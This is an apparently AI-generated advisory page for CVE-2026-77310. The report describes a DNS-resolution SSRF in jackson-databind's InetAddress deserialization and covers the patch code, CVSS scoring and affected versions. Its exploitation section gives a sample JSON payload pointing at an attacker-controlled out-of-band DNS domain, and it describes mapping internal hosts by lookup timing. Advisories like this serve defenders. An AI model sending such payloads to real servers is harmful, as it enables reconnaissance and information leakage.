CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



CVE-2026-77310

CVE-2026-77310: Server-Side Request Forgery via DNS Resolution in jackson-databind

Alon Barad
Alon Barad
Software Engineer

Sep 29, 2026·4 min read·1 visit

Executive Summary (TL;DR)

Jackson Databind's deserializer for java.net.InetAddress executes synchronous, blocking DNS resolution when processing hostnames, enabling remote, unauthenticated attackers to trigger outbound Server-Side Request Forgery (SSRF) via crafted JSON payloads.

A Server-Side Request Forgery (SSRF) vulnerability exists in FasterXML jackson-databind before versions 2.18.9, 2.21.5, 2.22.1, 3.1.5, and 3.2.1. The flaw occurs during the deserialization of java.net.InetAddress fields, where the library implicitly triggers eager DNS lookups. Unauthenticated remote attackers can exploit this behavior by passing arbitrary hostnames in JSON fields, forcing target servers to make outbound DNS lookup requests.

Vulnerability Overview

Jackson Databind is a widely utilized Java library for parsing and mapping JSON data to Java objects. When configuring serialization and deserialization routines, applications can ingest data containing complex types, including network-related Java native classes. The vulnerability resides within the deserialization path of java.net.InetAddress assets, exposing an unauthenticated attack surface to remote entities.

The vulnerability is classified under CWE-918 (Server-Side Request Forgery). By default, applications exposing endpoints that accept arbitrary JSON input and map it to Java models containing InetAddress elements can be forced to initiate outbound DNS lookups. This network behavior allows malicious actors to conduct infrastructure mapping, internal hostname verification, and out-of-band data exfiltration.

Root Cause Analysis

The root cause of the vulnerability lies in the deserialization routing within FromStringDeserializer.Std._deserialize(). When processing a string input that maps to the case STD_INET_ADDRESS, the deserializer passes the unvalidated value directly to InetAddress.getByName(value).

Java's native InetAddress.getByName(String host) method possesses an implicit network resolution dependency. If the passed string is a valid numeric IP address literal (either IPv4 or IPv6), the JVM parses it locally without network interaction. However, if the input is any other string, the JVM treats it as a hostname and initiates a synchronous, blocking outbound DNS lookup through the operating system's configured resolver.

This behavior is visualized in the sequence below:

Because jackson-databind did not validate that the string was restricted to IP literals prior to invoking getByName(), arbitrary strings trigger external DNS resolutions. Attackers can leverage this to force server-side connections to infrastructure controlled by the adversary.

Code Analysis and Patch Verification

The security issue was corrected in commit 2fc7bd9057dd051d7dea0e5fcad89822d0fa5ebd by implementing a local validation utility, InetAddressValidator.java. This validator is adapted from Google Guava's InetAddresses.isInetAddress() implementation to perform lexical checkouts without initiating any network activity.

In FromStringDeserializer.java, the case block was modified as follows:

// Before Patch
case STD_INET_ADDRESS:
    return InetAddress.getByName(value);
 
// After Patch
case STD_INET_ADDRESS:
    // Prevent DNS lookup: only accept valid IP address literals
    if (!InetAddressValidator.isInetAddress(value)) {
        return ctxt.handleWeirdStringValue(_valueClass, value,
                "Not a valid IP address string literal");
    }
    return InetAddress.getByName(value);

The validation layer guarantees that the deserializer will immediately reject arbitrary hostnames. The structure of InetAddressValidator.java focuses on checking the formatting rules of both IPv4 dotted-quad configurations and IPv6 hexadecimal blocks:

class InetAddressValidator {
    static boolean isInetAddress(String ipString) {
        return _ipStringToBytes(ipString) != null;
    }
    // Internal parsing logic performs strict numerical validations
}

This validator rejects leading zeros in IPv4 octets to avoid differences between decimal and octal interpretations across distinct JVM runtime implementations. Consequently, parser differential attacks are neutralized.

Exploitation Methodology

Exploitation requires an endpoint exposing a JSON parsing routine that deserializes data into a POJO with an InetAddress property. The attacker does not need authentication to execute this attack if the host application maps the API publicly.

Consider a vulnerable POJO registration:

public class SystemEndpoint {
    public String hostIdentifier;
    public java.net.InetAddress connectionAddress;
}

An attacker crafts a JSON payload containing an Out-of-Band (OOB) domain designed to log resolution queries:

{
  "hostIdentifier": "production-worker-01",
  "connectionAddress": "exfiltrate-test.attacker-controlled-dns.com"
}

When the web application ingests this payload, the library resolves the hostname during deserialization. The lookup query is successfully forwarded to the authoritative DNS server managed by the attacker. This confirms the vulnerability and leaks the egress server IP.

Impact Assessment

The vulnerability has a CVSS v3.1 base score of 5.3 (Medium). The vector string is CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N. The impact is limited to low confidentiality leakage.

Because the DNS resolution is synchronous and blocking, excessive requests to slow or non-responsive DNS authorities could lead to resource exhaustion on the target server. Furthermore, adversaries can utilize this vulnerability to map internal network boundaries by querying local hostnames and monitoring the timing of the response. If the DNS lookup completes quickly, the internal name exists; if it times out, the name is likely invalid.

Official Patches

FasterXMLCommit implementing the local validation helper to prevent DNS resolution.

Fix Analysis (1)

Technical Appendix

CVSS Score
5.3/ 10
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
EPSS Probability
0.31%
Top 78% most exploited

Affected Systems

Applications utilizing FasterXML jackson-databind to deserialize untrusted JSON into models containing java.net.InetAddress properties.

Affected Versions Detail

Product
Affected Versions
Fixed Version
jackson-databind (com.fasterxml.jackson.core)
FasterXML
>= 2.0.0, < 2.18.92.18.9
jackson-databind (com.fasterxml.jackson.core)
FasterXML
>= 2.19.0, < 2.21.52.21.5
jackson-databind (com.fasterxml.jackson.core)
FasterXML
>= 2.22.0, < 2.22.12.22.1
jackson-databind (tools.jackson.core)
FasterXML
>= 3.0.0, < 3.1.53.1.5
jackson-databind (tools.jackson.core)
FasterXML
>= 3.2.0, < 3.2.13.2.1
AttributeDetail
CWE IDCWE-918 (Server-Side Request Forgery)
Attack VectorNetwork (Unauthenticated)
CVSS v3.1 Score5.3 (Medium)
Exploit StatusProof-of-Concept Available
CISA KEV StatusNot Listed
Impact CategoryLow Confidentiality (SSRF via DNS)

MITRE ATT&CK Mapping

T1190Exploit Public-Facing Application
Initial Access
T1005Data from Local System
Collection
CWE-918
Server-Side Request Forgery (SSRF)

An application receives the administrative control to fetch a resource from a remote location, but does not sufficiently validate the target URI, allowing attackers to direct the request to arbitrary destinations.

Known Exploits & Detection

GitHub Security AdvisoryVulnerability details and reference issues outlining how resolving domain configurations impacts local services.

Vulnerability Timeline

Code fix design initiated in issue #6058
2026-07-05
Fix commit committed to master branch
2026-07-06
Official advisory GHSA-vvgp-rfg2-7rr6 and CVE-2026-77310 published
2026-08-24

References & Sources

  • [1]FasterXML Jackson Databind Security Advisory GHSA-vvgp-rfg2-7rr6
  • [2]NVD Vulnerability Record
  • [3]GitHub Pull Request #6058

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.

More Reports

•about 2 hours ago•CVE-2026-19032
5.3

CVE-2026-19032: Insecure Deserialization and Class Loading via java.nio.file.Path Resolution in FasterXML jackson-databind

An insecure deserialization vulnerability exists in FasterXML jackson-databind due to improper validation of URI schemes when resolving java.nio.file.Path properties. When binding untrusted JSON input to a Path field, the deserializer resolves attacker-supplied URIs without restriction. If the scheme is unrecognized by the default filesystem, the application falls back to querying registered SPI FileSystemProvider instances, causing class loading and potential side effects in environments with custom providers.

Alon Barad
Alon Barad
2 views•6 min read
•about 3 hours ago•CVE-2026-68497
7.5

CVE-2026-68497: CPU Denial of Service via XML Datatype Deserialization in FasterXML jackson-databind

CVE-2026-68497 is a high-severity CPU Denial of Service (DoS) vulnerability in jackson-databind. It arises because the library bypasses default input constraint checks when parsing stringified XML datatypes, subsequently passing arbitrary-length inputs to JDK constructors with quadratic execution complexity.

Alon Barad
Alon Barad
6 views•6 min read
•about 3 hours ago•CVE-2026-92905
5.3

CVE-2026-92905: Denial of Service in Zoho ManageEngine EventLog Analyzer and Log360 Log Collector

ZohoCorp ManageEngine EventLog Analyzer and Log360 before build 13071 were vulnerable to a denial-of-service (DoS) vulnerability that allowed unauthenticated remote attackers to crash the log collector service using malformed syslog packets.

Alon Barad
Alon Barad
7 views•5 min read
•about 3 hours ago•CVE-2026-88773
10.0

CVE-2026-88773: Critical HTTP Request Smuggling in Citrix NetScaler ADC and Gateway

A critical HTTP request/response smuggling vulnerability (CWE-444) exists in Citrix NetScaler ADC and Citrix NetScaler Gateway. This flaw arises from inconsistent request boundary parsing between NetScaler appliances and backend web servers, allowing remote, unauthenticated attackers to bypass security boundaries, access restricted resources, or hijack active user sessions on multiplexed TCP connections.

Amit Schendel
Amit Schendel
6 views•6 min read
•about 4 hours ago•CVE-2026-88058
8.6

CVE-2026-88058: Cross-Site Scripting via Server-Side Serialization Discrepancy in @angular/platform-server

A high-severity Cross-Site Scripting (XSS) vulnerability in Angular server-side rendering (SSR) component allows unauthenticated attackers to execute arbitrary client-side JavaScript. The flaw is caused by a parsing discrepancy between the server-side DOM emulator, Domino, and standard client-side browser HTML5 parsers. When serializing ProcessingInstruction nodes inside raw-content fallback elements, Domino fails to escape matching ancestor closing tags, causing the client-side parser to transition out of raw-text mode prematurely and execute subsequent sibling elements as active HTML.

Alon Barad
Alon Barad
5 views•9 min read
•about 5 hours ago•CVE-2026-101910
6.9

CVE-2026-101910: Server-Side Request Forgery Bypass via NAT64 Local-Use Address Range in ip-address Library

A validation bypass vulnerability exists in the npm package `ip-address` from version 10.2.0 to 10.5.1. The library's `Address6.isPrivate()` classifier fails to recognize the NAT64 local-use prefix range 64:ff9b:1::/48 as a restricted, private subnet. In networks implementing NAT64 routing configurations, an attacker can exploit this flaw to execute Server-Side Request Forgery (SSRF) and bypass local trust-boundary validations.

Alon Barad
Alon Barad
5 views•6 min read